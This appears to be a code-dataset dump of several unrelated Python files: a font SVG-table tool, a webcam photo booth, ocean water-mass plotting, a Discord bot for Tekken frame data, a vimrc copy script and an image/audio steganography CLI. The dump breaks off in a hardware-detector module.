file=sys.stderr)\n\tsys.exit(1)\n\nreVerStr = re.compile(r\"^[0-9]+(\\.[0-9]+)?\")\ndef verStr2Num(verStr):\n\tv = reVerStr.match(verStr)\n\tif v:\n\t\treturn eval(v.group(0))\n\treturn 0\n\nminFTversion = '3.0'\nminVersion = verStr2Num(minFTversion)\ncurVersion = verStr2Num(ftversion)\n\nif curVersion < minVersion:\n\tprint(\"ERROR: The FontTools module version must be %s or higher.\\n\\\n You have version %s installed.\\n\\\n Get the latest version at %s\" % (minFTversion, ftversion, fontToolsURL),\n\tfile=sys.stderr)\n\tsys.exit(1)\n\n\ndef readFile(filePath):\n\tf = open(filePath, \"rt\")\n\tdata = f.read()\n\tf.close()\n\treturn data\n\n\ndef getGlyphNameFromFileName(filePath):\n\tfontFileName = os.path.split(filePath)[1]\n\treturn os.path.splitext(fontFileName)[0]\n\n\nreIDvalue = re.compile(r\"<svg[^>]+?(id=\\\".*?\\\").+?>\", re.DOTALL)\n\ndef setIDvalue(data, gid):\n\tid = reIDvalue.search(data)\n\tif id:\n\t\tnewData = re.sub(id.group(1), 'id=\"glyph%s\"' % gid, data)\n\telse:\n\t\tnewData = re.sub('<svg', '<svg id=\"glyph%s\"' % gid, data)\n\treturn newData\n\n\nreViewBox = re.compile(r\"(<svg.+?)(\\s+viewBox=[\\\"|\\'][\\d, ]+[\\\"|\\'])(.+?>)\", re.DOTALL)\n\ndef stripViewBox(svgItemData):\n\t\"\"\"\n\tRemoves the viewBox parameter from the <svg> element.\n\t\"\"\"\n\tvb = reViewBox.search(svgItemData)\n\tif vb:\n\t\tsvgItemData = reViewBox.sub(r\"\\g<1>\\g<3>\", svgItemData)\n\treturn svgItemData\n\n\nreXMLheader = re.compile(r\"<\\?xml .*\\?>\")\nreEnableBkgrd = re.compile(r\"( enable-background=[\\\"|\\'][new\\d, ]+[\\\"|\\'])\")\nreWhiteSpaceBtween = re.compile(r\">\\s+<\", re.MULTILINE)\nreWhiteSpaceWithin = re.compile(r\"\\s+\", re.MULTILINE)\n\ndef cleanupSVGdoc(svgItemData):\n\t# Remove XML 
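A quick standalone check of the id/viewBox rewriting idea used in setIDvalue/stripViewBox above; the two patterns here are simplified assumptions, not the script's verified originals:

import re

re_id = re.compile(r'<svg[^>]+?(id=".*?").+?>', re.DOTALL)                    # assumed pattern
re_viewbox = re.compile(r'(<svg.+?)(\s*viewBox="[\d, ]+")(.+?>)', re.DOTALL)  # assumed pattern

doc = '<svg id="old" viewBox="0 0 10 10"><path d="M0 0"/></svg>'
print(re.sub(re_id.search(doc).group(1), 'id="glyph7"', doc))  # id rewritten
print(re_viewbox.sub(r'\g<1>\g<3>', doc))                      # viewBox dropped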
header\n\tsvgItemData = reXMLheader.sub('', svgItemData)\n\n\t# Remove all 'enable-background' parameters\n\tfor enableBkgrd in reEnableBkgrd.findall(svgItemData):\n\t\tsvgItemData = svgItemData.replace(enableBkgrd, '')\n\n\t# Remove all white space BETWEEN elements\n\tfor whiteSpace in reWhiteSpaceBtween.findall(svgItemData):\n\t\tsvgItemData = svgItemData.replace(whiteSpace, '><')\n\n\t# Replace all white space WITHIN elements with a single space\n\tfor whiteSpace2 in reWhiteSpaceWithin.findall(svgItemData):\n\t\tsvgItemData = svgItemData.replace(whiteSpace2, ' ')\n\n\treturn svgItemData\n\n\nreCopyCounter = re.compile(\"#\\d+$\")\n\ndef makeFontCopyPath(fontPath):\n\tdirName, fileName = os.path.split(fontPath)\n\tfileName, fileExt = os.path.splitext(fileName)\n\tfileName = reCopyCounter.split(fileName)[0]\n\tfontCopyPath = os.path.join(dirName, fileName + fileExt)\n\tn = 0\n\twhile os.path.exists(fontCopyPath):\n\t\tfontCopyPath = os.path.join(dirName, fileName + \"#\" + repr(n) + fileExt)\n\t\tn += 1\n\treturn fontCopyPath\n\n\ndef processFont(fontPath, svgFilePathsList, options):\n\tfont = ttLib.TTFont(fontPath)\n\n\tsvgDocsDict = {}\n\tgNamesSeenAlreadyList = []\n\n\tsvgGlyphsAdded = 0\n\n\tfor svgFilePath in svgFilePathsList:\n\t\tgName = getGlyphNameFromFileName(svgFilePath)\n\n\t\tif gName in options.glyphNamesToExclude:\n\t\t\tcontinue\n\n\t\ttry:\n\t\t\tgid = font.getGlyphID(gName)\n\t\texcept KeyError:\n\t\t\tprint(\"WARNING: Could not find a glyph named %s in the font %s\" % \\\n\t\t\t (gName, os.path.split(fontPath)[1]), file=sys.stderr)\n\t\t\tcontinue\n\n\t\tif gName in gNamesSeenAlreadyList:\n\t\t\tprint(\"WARNING: Skipped a duplicate file named %s.svg at %s\" % \\\n\t\t\t (gName, svgFilePath), file=sys.stderr)\n\t\t\tcontinue\n\t\telse:\n\t\t\tgNamesSeenAlreadyList.append(gName)\n\n\t\tsvgItemData = readFile(svgFilePath)\n\n\t\t# Set id value\n\t\tsvgItemData = setIDvalue(svgItemData, gid)\n\n\t\t# Remove the viewBox parameter\n\t\tif options.stripViewBox:\n\t\t\tsvgItemData = stripViewBox(svgItemData)\n\n\t\t# Clean-up SVG document\n\t\tsvgItemData = cleanupSVGdoc(svgItemData)\n\n\t\tsvgDocsDict[gid] = [svgItemData.strip(), gid, gid]\n\t\tsvgGlyphsAdded += 1\n\n\t# Don't do any changes to the input font if there's no SVG data\n\tif not svgDocsDict:\n\t\tprint(\"Could not find any SVG files that can be added to the font.\", file=sys.stdout)\n\t\tsys.exit(0)\n\n\tsvgDocsList = [svgDocsDict[index] for index in sorted(svgDocsDict.keys())]\n\n\tsvgTable = ttLib.newTable('SVG ')\n\tsvgTable.compressed = options.compressSVGs\n\tsvgTable.docList = svgDocsList\n\tsvgTable.colorPalettes = None\n\tfont['SVG '] = svgTable\n\n\t# Make copy of the original font\n\tif options.makeFontCopy:\n\t\tfontCopyPath = makeFontCopyPath(fontPath)\n\t\tcopy2(fontPath, fontCopyPath)\n\n\tfont.save(fontPath)\n\n\tif options.generateWOFFs:\n\t\tfont['SVG '].compressed = False # WOFF files are smaller if SVG table is uncompressed\n\t\tfor ext in ['woff', 'woff2']:\n\t\t\twoffFontPath = os.path.splitext(fontPath)[0] + '.' 
+ ext\n\t\t\tfont.flavor = ext\n\t\t\tfont.save(woffFontPath)\n\n\tfont.close()\n\n\tprint(\"%s SVG glyphs were successfully added to %s\" % \\\n\t (svgGlyphsAdded, os.path.split(fontPath)[1]), file=sys.stdout)\n\n\nreSVGelement = re.compile(r\"<svg.+?>.+?</svg>\", re.DOTALL)\nreTEXTelement = re.compile(r\"<text.+?>.+?</text>\", re.DOTALL)\n\ndef validateSVGfiles(svgFilePathsList):\n\t\"\"\"\n\tLight validation of SVG files.\n\t - checks that there is an <svg> element.\n\t - skips files that have a <text> element.\n\t\"\"\"\n\tvalidatedPaths = []\n\n\tfor filePath in svgFilePathsList:\n\t\t# Skip hidden files (filenames that start with period)\n\t\tfileName = os.path.basename(filePath)\n\t\tif fileName.startswith('.'):\n\t\t\tcontinue\n\n\t\t# Skip files that don't end with SVG extension\n\t\tif not fileName.lower().endswith('.svg'):\n\t\t\tcontinue\n\n\t\tassert os.path.isfile(filePath), \"Not a valid file path: %s\" % filePath\n\t\tdata = readFile(filePath)\n\n\t\t# Find <svg> blob\n\t\tsvg = reSVGelement.search(data)\n\t\tif not svg:\n\t\t\tprint(\"WARNING: Could not find <svg> element in the file. Skipping %s\" % (filePath))\n\t\t\tcontinue\n\n\t\t# Warn about <text> elements\n\t\ttext = reTEXTelement.search(data)\n\t\tif text:\n\t\t\tprint(\"WARNING: Found <text> element in the file. Skipping %s\" % (filePath))\n\t\t\tcontinue\n\n\t\tvalidatedPaths.append(filePath)\n\n\treturn validatedPaths\n\n\ndef getFontFormat(fontFilePath):\n\tf = open(fontFilePath, \"rb\")\n\thead = f.read(4).decode()\n\tf.close()\n\tif head == \"OTTO\":\n\t\treturn \"OTF\"\n\telif head in (\"\\0\\1\\0\\0\", \"true\"):\n\t\treturn \"TTF\"\n\treturn None\n\n\ndef validateFontPaths(pathsList):\n\tvalidatedPathsList = []\n\tfor path in pathsList:\n\t\tpath = os.path.realpath(path)\n\t\tif os.path.isfile(path) and getFontFormat(path) in ['OTF','TTF']:\n\t\t\tvalidatedPathsList.append(path)\n\t\telse:\n\t\t\tprint(\"ERROR: %s is not a valid font file path.\" % path, file=sys.stderr)\n\treturn validatedPathsList\n\n\nclass Options(object):\n\tsvgFolderPath = None\n\tmakeFontCopy = True\n\tgenerateWOFFs = False\n\tcompressSVGs = False\n\tglyphNamesToExclude = []\n\tstripViewBox = True\n\n\tdef __init__(self, rawOptions):\n\t\tfor option, value in rawOptions:\n\t\t\tif option == \"-h\":\n\t\t\t\tprint(__doc__)\n\t\t\t\tsys.exit(0)\n\t\t\telif option == \"-m\":\n\t\t\t\tself.makeFontCopy = False\n\t\t\telif option == \"-w\":\n\t\t\t\tself.generateWOFFs = True\n\t\t\telif option == \"-z\":\n\t\t\t\tself.compressSVGs = True\n\t\t\telif option == \"-k\":\n\t\t\t\tself.stripViewBox = False\n\t\t\telif option == \"-x\":\n\t\t\t\tif value:\n\t\t\t\t\tself.glyphNamesToExclude.extend(value.split(','))\n\t\t\telif option == \"-s\":\n\t\t\t\tif value:\n\t\t\t\t\tpath = os.path.realpath(value)\n\t\t\t\t\tif os.path.isdir(path):\n\t\t\t\t\t\tself.svgFolderPath = path\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"ERROR: %s is not a valid folder path.\" % path, file=sys.stderr)\n\t\t\t\t\t\tsys.exit(1)\n\n\ndef parseOptions(args):\n\ttry:\n\t\trawOptions, files = getopt.getopt(args, \"hkms:wx:z\")\n\texcept getopt.GetoptError as err:\n\t\tprint(\"ERROR:\", err, file=sys.stderr)\n\t\tsys.exit(2)\n\n\treturn validateFontPaths(files), Options(rawOptions)\n\n\ndef run():\n\tfontPathsList, options = parseOptions(sys.argv[1:])\n\n\tif not len(fontPathsList):\n\t\tprint(\"ERROR: No valid font file path was provided.\", file=sys.stderr)\n\t\tsys.exit(1)\n\n\tif not options.svgFolderPath:\n\t\tprint(\"ERROR: Path to folder containing SVG files was not provided.\", 
file=sys.stderr)\n\t\tsys.exit(1)\n\telse:\n\t\tsvgFilePathsList = []\n\t\tfor dirName, subdirList, fileList in os.walk(options.svgFolderPath): # Support nested folders\n\t\t\tfor file in fileList:\n\t\t\t\tsvgFilePathsList.append(os.path.join(dirName, file))\n\n\t# Validate the SVGs\n\tsvgFilePathsList = validateSVGfiles(svgFilePathsList)\n\n\tif not svgFilePathsList:\n\t\tprint(\"No SVG files were found.\", file=sys.stdout)\n\t\tsys.exit(1)\n\n\tprocessFont(fontPathsList[0], svgFilePathsList, options)\n\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) == 1:\n\t\tprint(__doc__)\n\telse:\n\t\trun()\n","sub_path":"addSVGtable.py","file_name":"addSVGtable.py","file_ext":"py","file_size_in_byte":9435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"182875159","text":"'''\nBased on https://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_objdetect/py_face_detection/py_face_detection.html#face-detection\n\nLook here for more cascades: https://github.com/parulnith/Face-Detection-in-Python-using-OpenCV/tree/master/data/haarcascades\n\n\nEdited by David Goedicke\n'''\n\n\nimport numpy as np\nimport cv2\nimport sys\nimport time\nimport qwiic_button\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\nimg=None\nwebCam = False\n\nbuttonR = qwiic_button.QwiicButton(0x6f)\nbuttonR.begin()\nbuttonR.LED_off()\n\nif(len(sys.argv)>1):\n    try:\n        print(\"I'll try to read your image\")\n        img = cv2.imread(sys.argv[1])\n        if img is None:\n            print(\"Failed to load image file:\", sys.argv[1])\n    except:\n        print(\"Failed to load the image. Are you sure that:\", sys.argv[1],\"is a path to an image?\")\nelse:\n    try:\n        print(\"Trying to open the Webcam.\")\n        cap = cv2.VideoCapture(0)\n        if cap is None or not cap.isOpened():\n            raise Exception(\"No camera\")\n        webCam = True\n    except:\n        img = cv2.imread(\"../data/test.jpg\")\n        print(\"Using default image.\")\n\ni = 0\n\nwhile(True):\n    if webCam:\n        ret, img = cap.read()\n\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    copy = cv2.cvtColor(img, cv2.COLOR_BGR2BGRA)\n\n    faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n    for (x,y,w,h) in faces:\n        img = cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n        cv2.putText(img, \"Want to take a photo?\",(50,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,0,),2,cv2.LINE_AA)\n        if buttonR.is_button_pressed():\n            cv2.imwrite('pic0' + str(i) + '.jpg',copy)\n            i += 1\n            time.sleep(0.2)\n\n    if webCam:\n        cv2.imshow('face-detection (press q to quit.)',img)\n        if cv2.waitKey(1) & 0xFF == ord('q'):\n            cap.release()\n            break\n    else:\n        break\n\ncv2.destroyAllWindows()\n","sub_path":"Lab 5/photo-booth/face-detection.py","file_name":"face-detection.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"236488446","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUsed for plotting spatial distribution of water mass omp solutions\n\nCan also be used for calculating global inventories\n\n\"\"\"\n\n\n\nimport iris\nimport iris.plot as iplt\nimport model_dicts as md\nimport matplotlib.pyplot as plt\nimport cartopy.crs as ccrs\nimport cmocean as cmo\nimport numpy as np\nimport numpy.ma as ma\nimport matplotlib.colors as colors\nimport omp3\n\n\n\n\n\ndef big_mean(cube):\n    grid_areas = iris.analysis.cartography.area_weights(cube)\n    bnds=cube.coord('depth').bounds\n    lt=bnds[:,1]-bnds[:,0]\n    volume_weights = lt[:, np.newaxis, np.newaxis] * 
grid_areas\n volume_weights=ma.masked_array(volume_weights,cube.data.mask)\n\n new_cube=cube.collapsed(['depth', 'latitude', 'longitude'],\n iris.analysis.MEAN, weights=volume_weights)\n \n return new_cube #maybe return volume weights\n\n\n#do same as that but for depth\n \n\n\ndef depth_mean(cube):\n grid_areas = iris.analysis.cartography.area_weights(cube)\n bnds=cube.coord('depth').bounds\n lt=bnds[:,1]-bnds[:,0]\n volume_weights = lt[:, np.newaxis, np.newaxis] * grid_areas\n volume_weights=ma.masked_array(volume_weights,cube.data.mask)\n\n new_cube=cube.collapsed(['depth'],\n iris.analysis.MEAN, weights=volume_weights)\n \n return new_cube,volume_weights\n \ndef plot_omp_map(cube, ptype='volume', type='contourf', levs=None, depths=None,\n extent=None):\n if depths!=None:\n depmin=(np.abs(cube.coord('depth').points -depths[0])).argmin()\n depmax=(np.abs(cube.coord('depth').points -depths[1])).argmin() \n cube,volumes=depth_mean(cube[depmin:depmax+1,:,:])\n else:\n cube,volumes=depth_mean(cube)\n cvolumes=np.sum(volumes, axis=0)\n ax = plt.axes(projection=ccrs.PlateCarree())\n if extent==None:\n ax.set_global()\n else:\n ax.set_extent(extent)\n ax.coastlines()\n \n if ptype=='volume': \n cvolumes=np.sum(volumes, axis=0)\n cube.data=cube.data*cvolumes\n elif ptype=='fraction':\n pass\n \n if levs != None:\n norm=colors.BoundaryNorm(boundaries=levs, ncolors=256)\n else:\n norm=None\n\n if type=='contourf':\n cs=iplt.contourf(cube, axes=ax, cmap=cmo.cm.deep, levels=levs,norm=norm)\n elif type=='pcolormesh':\n cs=iplt.pcolormesh(cube, axes=ax, cmap=cmo.cm.deep, norm=norm)\n\n \n plt.colorbar(cs,spacing='proportional', orientation='horizontal')\n \n return cs\n\n\n\ndef vol_sum(cube):\n cube,volumes=depth_mean(cube)\n cvolumes=np.sum(volumes, axis=0)\n cube.data=cube.data*cvolumes\n vol_sum=np.sum(cube.data)\n total_vol=np.sum(volumes)\n vol_frac=vol_sum/total_vol\n return vol_sum, vol_frac\n \n\ndef ocean_volume(cube):\n cube,volumes=depth_mean(cube)\n total_vol=np.sum(volumes)\n return total_vol\n\ndef inventory(NADW, AABW, P_IDW):\n v0,f0=vol_sum(NADW)\n v1,f1=vol_sum(AABW)\n v2,f2=vol_sum(P_IDW)\n \n tf=f0+f1+f2\n tv=v0+v1+v2 \n \n v_tot=ocean_volume(NADW)\n \n results={'NADW_volume':v0, 'NADW_fraction':f0, \n 'AABW_volume':v1, 'AABW_fraction':f1, 'I_PDW_volume':v2, \n 'I_PDW_fraction':f2, 'total_fraction':tf, 'total_volume':tv, \n 'total_ocean':v_tot, 'AABW/NADW': v1/v0}\n \n return results\n\n\nif __name__=='__main__':\n\n\n temp0=iris.load_cube(md.files['obs_temp'])\n sal0=iris.load_cube(md.files['obs_sal'])\n \n cubes2=iris.load(md.files['obs_omp_idw'])\n for cube2 in cubes2:\n if cube2.long_name=='x0':\n x0=cube2\n if cube2.long_name=='x1':\n x1=cube2\n if cube2.long_name=='x2':\n x2=cube2\n \n \n #results=inventory(x0,x1,x2)\n #print [(key,value) for (key, value) in sorted(results.items())]\n \n levs=[0,0.001,0.025,0.05,0.075,0.1,0.15,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1]\n \n depths=[700,1200]\n \n plot_omp_map(x0,ptype='fraction',type='pcolormesh', levs=levs, depths=depths)\n plt.title('NADW')\n plt.show()\n \n plot_omp_map(x2,ptype='fraction',type='pcolormesh', levs=levs, depths=depths)\n plt.title('IDW')\n plt.show()\n \n \n #print [(key,value) for (key, value) in sorted(results.items())]\n \n","sub_path":"omp_map_plots.py","file_name":"omp_map_plots.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"432134865","text":"#!/usr/bin/env python3\nimport os, sys\nimport datetime\nimport 
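The volume weighting in big_mean/depth_mean above reduces to a thickness-times-area weighted average over the cube. A plain numpy sketch with synthetic data (no iris dependency; shapes are illustrative):

import numpy as np

rng = np.random.default_rng(0)
data = rng.random((3, 4, 5))              # depth x lat x lon values
areas = rng.random((4, 5))                # horizontal cell areas
thickness = np.array([10.0, 20.0, 40.0])  # layer thicknesses from depth bounds
weights = thickness[:, None, None] * areas   # broadcast to (3, 4, 5)
print((data * weights).sum() / weights.sum())  # volume-weighted mean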
logging\nimport discord\nfrom discord.ext import commands\n\nimport tkfinder\n\nprefix = '§'\ndescription = 'The premier Tekken 7 Frame bot, made by Baikonur#4927'\nbot = commands.Bot(command_prefix=prefix, description=description)\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.WARNING)\nfile_handler = logging.FileHandler('log/logfile.log')\n\nformatter = logging.Formatter('%(asctime)s : %(levelname)s : %(name)s : %(message)s')\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\n# Dict for searching special move types\nmove_types = {'ra': 'Rage art',\n 'rage_art': 'Rage art',\n 'rd': 'Rage drive',\n 'rage_drive': 'Rage drive',\n 'wb': 'Wall bounce',\n 'wall_bounce': 'Wall bounce',\n 'ts': 'Tail spin',\n 'tail_spin': 'Tail spin',\n 'screw': 'Tail spin',\n 'homing': 'Homing',\n 'homari': 'Homing',\n 'armor': 'Power crush',\n 'armori': 'Power crush',\n 'pc': 'Power crush',\n 'power': 'Power crush',\n 'power_crush': 'Power crush'}\n\n# Get token from local txt file\ndirname, pyfilename = os.path.split(os.path.abspath(sys.argv[0]))\ntfilename = os.path.join(dirname, 'token.txt')\n\nwith open(tfilename) as token_file:\n token = token_file.read().strip()\n\n\ndef move_embed(character, move):\n '''Returns the embed message for character and move'''\n embed = discord.Embed(title=character['proper_name'],\n colour=0x00EAFF,\n url=character['online_webpage'],\n description='**Move: ' + move['Command'] + '**')\n\n embed.set_thumbnail(url=character['portrait'])\n embed.add_field(name='Property', value=move['Hit level'])\n embed.add_field(name='Damage', value=move['Damage'])\n embed.add_field(name='Startup', value='i' + move['Start up frame'])\n embed.add_field(name='Block', value=move['Block frame'])\n embed.add_field(name='Hit', value=move['Hit frame'])\n embed.add_field(name='Counter Hit', value=move['Counter hit frame'])\n embed.add_field(name='Notes', value=(move['Notes'] if move['Notes'] else \"-\"))\n if move['Gif']:\n embed.add_field(name='Gif', value=move['Gif'], inline=False)\n\n return embed\n\n\ndef move_list_embed(character, move_list, move_type):\n '''Returns the embed message for a list of moves matching to a special move type'''\n desc_string = ''\n for move in move_list:\n desc_string += move + '\\n'\n\n embed = discord.Embed(title=character['proper_name'] + ' ' + move_type.lower() + ':',\n colour=0x00EAFF,\n description=desc_string)\n\n return embed\n\n\ndef error_embed(err):\n embed = discord.Embed(title='Error',\n colour=0xFF4500,\n description=err)\n\n return embed\n\n\ndef similar_moves_embed(similar_moves):\n embed = discord.Embed(title='Move not found', colour=0xfcba03,\n description='Similar moves:\\n**{}**'\n .format('** **\\n'.join(similar_moves)))\n return embed\n\n\n@bot.event\nasync def on_ready():\n print(datetime.datetime.utcnow().isoformat())\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('------')\n\n\n@bot.command()\nasync def test(ctx):\n print('Testing...')\n embed = discord.Embed(title='Test title', description='A test embed thing.', colour=0x0000FF)\n embed.set_author(name='Test name', icon_url=bot.user.default_avatar_url)\n await ctx.send(embed=embed, delete_after=60)\n\n\n@bot.event\nasync def on_message(message):\n '''This has the main functionality of the bot. 
It has a lot of\n things that would be better suited elsewhere but I don't know\n if I'm going to change it.\n '''\n\n try:\n channel = message.channel\n\n if message.content == '?help':\n msg = await channel.send(embed=help_embed())\n\n if message.content == '!delete-data':\n deleted = await channel.purge(limit=200, check=is_me)\n return\n\n if message.content.startswith('!'):\n\n delete_after = 13\n if ('tekken' in channel.name) or ('frame' in channel.name):\n delete_after = None\n\n user_message = message.content\n user_message = user_message.replace('!', '')\n user_message_list = user_message.split(' ', 1)\n\n if len(user_message_list) <= 1:\n # malformed command\n return\n\n chara_name = user_message_list[0].lower()\n chara_move = user_message_list[1]\n if chara_name == 'armor' or chara_name == 'ak':\n chara_name = 'armor_king'\n elif chara_name == 'dj' or chara_name == 'dvj' or chara_name == 'djin' or chara_name == 'devil' or chara_name == 'deviljin' or chara_name == 'diablojim' or chara_name == 'taika-jim':\n chara_name = 'devil_jin'\n elif chara_name == 'sergei' or chara_name == 'drag' or chara_name == 'dragu':\n chara_name = 'dragunov'\n elif chara_name == 'goose':\n chara_name = 'geese'\n elif chara_name == 'hwo' or chara_name == 'hwoa':\n chara_name = 'hwoarang'\n elif chara_name == 'jack' or chara_name == 'jack-7' or chara_name == \"jaska\":\n chara_name = 'jack7'\n elif chara_name == 'julle':\n chara_name = 'julia'\n elif chara_name == 'chloe' or chara_name == 'lc' or chara_name == 'lucky':\n chara_name = 'lucky_chloe'\n elif chara_name == 'hei' or chara_name == 'hessu' or chara_name == 'heiska':\n chara_name = 'heihachi'\n elif chara_name == 'kata' or chara_name == 'kat':\n chara_name = 'katarina'\n elif chara_name == 'kaz' or chara_name == 'kazze':\n chara_name = 'kazuya'\n elif chara_name == 'karhu' or chara_name == 'panda':\n chara_name = 'kuma'\n elif chara_name == 'mara':\n chara_name = 'marduk'\n elif chara_name == 'master' or chara_name == 'raven' or chara_name == 'mraven' or chara_name == 'masterraven':\n chara_name = 'master_raven'\n elif chara_name == 'nocto':\n chara_name = 'noctis'\n elif chara_name == 'pave':\n chara_name = 'paul'\n elif chara_name == 'sha':\n chara_name = 'shaheen'\n elif chara_name == 'yoshi':\n chara_name = 'yoshimitsu'\n elif chara_name == 'ling':\n chara_name = 'xiaoyu'\n elif chara_name == \"zaffy\" or chara_name == 'zaf':\n chara_name = 'zafina'\n\n character = tkfinder.get_character(chara_name)\n if character is not None:\n if chara_move.lower() in move_types:\n chara_move = chara_move.lower()\n move_list = tkfinder.get_by_move_type(character, move_types[chara_move])\n if len(move_list) < 1:\n embed = error_embed('No ' + move_types[chara_move].lower() + ' for ' + character['proper_name'])\n msg = await channel.send(embed=embed, delete_after=delete_after)\n elif len(move_list) == 1:\n move = tkfinder.get_move(character, move_list[0], False)\n embed = move_embed(character, move)\n msg = await channel.send(embed=embed, delete_after=delete_after)\n elif len(move_list) > 1:\n embed = move_list_embed(character, move_list, move_types[chara_move])\n msg = await channel.send(embed=embed, delete_after=delete_after)\n\n else:\n move = tkfinder.get_move(character, chara_move, True)\n\n # First checks the move as case sensitive, if it doesn't find it\n # it checks it case unsensitive\n\n if move is not None:\n embed = move_embed(character, move)\n msg = await channel.send(embed=embed, delete_after=delete_after)\n else:\n move = 
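The long alias elif-chain above could equally be a single dict lookup; a small sketch with a few of the same mappings (subset only, for illustration):

ALIASES = {'ak': 'armor_king', 'armor': 'armor_king',
           'sergei': 'dragunov', 'drag': 'dragunov',
           'yoshi': 'yoshimitsu', 'ling': 'xiaoyu'}

name = 'ak'
name = ALIASES.get(name, name)  # fall back to the name itself
print(name)  # -> armor_king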
tkfinder.get_move(character, chara_move, False)\n                        if move is not None:\n                            embed = move_embed(character, move)\n                            msg = await channel.send(embed=embed, delete_after=delete_after)\n                        else:\n                            similar_moves = tkfinder.get_similar_moves(chara_move, chara_name)\n                            embed = similar_moves_embed(similar_moves)\n                            msg = await channel.send(embed=embed, delete_after=delete_after)\n            else:\n                bot_msg = 'Character ' + chara_name + ' does not exist.'\n                embed = error_embed(bot_msg)\n                msg = await message.channel.send(embed=embed, delete_after=5)\n                return\n        await bot.process_commands(message)\n    except Exception as e:\n        print(e)\n        logger.error(e)\n\n\ndef help_embed():\n    text = \"```\" \\\n           \"!character move - get frame data of a move from a character \\n\" \\\n           \"!delete-data - deletes the bot's own recent messages\\n\" \\\n           \"\\n\" \\\n           \"The bot automatically deletes its own messages after 10 seconds except in channels with 'tekken' or 'frame' in the name```\\n\\n\" \\\n           \"Much thanks and love to T7Chicken Team, BKNR, Dreamotion, Jacket, Cangu and Vesper. \\n\\n\" \\\n           \"This project wouldn't be possible without you guys <3\"\n    embed = discord.Embed(title='Commands', description=text, colour=0x37ba25)\n    embed.set_author(name='Author: Tib')\n\n    return embed\n\n\ndef is_me(m):\n    return m.author == bot.user\n\n\nbot.run(token)\n","sub_path":"mokujin.py","file_name":"mokujin.py","file_ext":"py","file_size_in_byte":10024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"548624933","text":"from os.path import expanduser, isfile\nfrom os import getcwd, rename\nfrom shutil import copyfile\nimport sys\n\ndef copy():\n    print( \"Creating a backup vimrc at \" + backup )\n    rename( vimrc, backup )\n    print( \"Copying from \" + path + \" to \" + vimrc )\n    copyfile( path, vimrc )\n\nif sys.version_info[0] < 3:\n    raise Exception(\"Must be using Python 3!\")\n\npath = expanduser( \"~\" ) + \"/.vimrc\"\nvimrc = getcwd() + \"/vimrc/.vimrc\"\nbackup = vimrc + \".bak\"\n\nif isfile( path ):\n    copy()\nelse:\n    print( path + \" couldn't be found!\" )\n\n","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"593224507","text":"import argparse\nimport os\nfrom image_steganography import ImageSteganography\nfrom audio_steganography import AudioSteganography\nfrom termcolor import cprint \n\n'''\nParser of command line arguments\n'''\ndef args_parser():\n    #Parser of command line arguments\n    parser = argparse.ArgumentParser()\n    \n    #Initialization of needed arguments\n    parser.add_argument(\"-encode\", \"-e\", dest=\"encode_check\", help=\"Encode the message in the file\", action='store_true')\n    parser.add_argument(\"-input\", \"-i\", dest=\"input\", help=\"Input file path of the image (PNG) or the audio (WAV) to be encrypted or decrypted\")\n    parser.add_argument(\"-output\", \"-o\", dest=\"output\", help=\"Output file path of the image (PNG) or the audio (WAV) with secret message\")\n    parser.add_argument(\"-message\", \"-msg\", dest=\"msg\", help=\"Message to be encrypted\")\n\n    #Parse command line arguments\n    args = parser.parse_args()\n    \n    #Check if the arguments have been specified on command line\n    if (not args.input) or (not os.path.exists(args.input)) or \\\n       (args.encode_check and not args.output):\n        parser.print_help()\n        exit(0)\n    \n    return args.encode_check, args.input, args.output, args.msg\n\ndef main():\n    is_encode, input_path, output_path, secret_msg = 
args_parser()\n    st = None\n\n    if input_path[-4:] == '.png':\n        st = ImageSteganography(input_path)\n    elif input_path[-4:] == '.wav':\n        st = AudioSteganography(input_path)\n    else:\n        cprint('\\nFile type not supported', 'red', end='\\n\\n')\n        exit(0)\n\n    if is_encode:\n        if not secret_msg:\n            cprint('\\nWrite the message to be hidden:', 'blue')\n            cprint('_________________________________', 'blue')\n            secret_msg = input()\n            cprint('_________________________________', 'blue', end='\\n\\n')\n        \n        st.encode(secret_msg, output_path)\n    else:\n        cprint('\\nHidden message:', 'blue')\n        cprint('_________________________________', 'blue')\n        st.decode()\n        cprint('_________________________________', 'blue', end='\\n\\n')\n\nif __name__=='__main__':\n    main()","sub_path":"Steganography/src/steganography.py","file_name":"steganography.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"190736360","text":"# Copyright 2019 Nokia\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport inspect\nimport hw_detector.hw_type as hwbase_type\n\ndef _import_classes(module_name, module_type):\n    classes = []\n    try:\n        __import__(module_name)\n    except ImportError as e:\n        